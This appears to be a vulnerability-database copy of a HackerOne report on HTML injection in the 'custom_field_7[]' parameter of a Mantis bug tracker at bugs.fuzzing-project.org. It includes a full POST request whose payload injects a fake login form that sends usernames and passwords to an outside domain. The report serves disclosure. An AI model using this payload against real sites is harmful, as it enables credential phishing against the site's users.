Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneDragonjarH1:903869
HistoryJun 20, 2020 - 4:11 p.m.

Hanno's projects: [bugs.fuzzing-project.org] HTML Injection via 'custom_field_7[]' parameter in '/view_all_set.php'

2020-06-2016:11:52
dragonjar
hackerone.com
9
JSON

Vulnerable Website URL or Application:

https://bugs.fuzzing-project.org/view_all_set.php?f=3

Description of Security Issue:

By not properly cleaning the information entered in the custom_field_7[] field, an attacker could send emails to company customers, pointing to a legitimate fuzzing project domain where they are prompted for data, the possibility of successful phishing is excellent as the form is within the domain of the company.

Please provide an exploit scenario for this vulnerability:

This could be a form where information is requested and sent to an external domain

{F876158}

POST /view_all_set.php?f=3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://bugs.fuzzing-project.org/
Cookie: MANTIS_secure_session=0;MANTIS_collapse_settings=|sidebar:1|filter:1;PHPSESSID=1495fp23866b0m12bi541et8c7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1947
Host: bugs.fuzzing-project.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

category_id[]=0&custom_field_1[]=0&custom_field_2[]=0&custom_field_3[]=0&custom_field_4[]=0&custom_field_5[]=0&custom_field_6[]=0&custom_field_7[]=0'"()%26%25"'</td>--&gt;<div><div><div><div><h4><i></i>Inicio de sesión</h4><div></div>&lt;form id="login-form" method="post" action="https://www.dragonjar.org"&gt;&lt;fieldset&gt;&lt;label for="username" class="block clearfix"&gt;<span>&lt;input id="username" name="username" type="text" placeholder="Nombre de usuario"   size="32" maxlength="191" value=""   class="form-control autofocus"&gt;<i></i></span>&lt;/label&gt;&lt;label for="password" class="block clearfix"&gt;<span>&lt;input id="password" name="password" type="password" placeholder="Contraseña" size="32" maxlength="1024" class="form-control autofocus"&gt;<i></i></span>&lt;/label&gt;<div></div>&lt;input type="submit" class="width-40 pull-right btn btn-success btn-inverse bigger-110" value="Iniciar sesión" /&gt;&lt;/fieldset&gt;&lt;/form&gt;</div>
JSON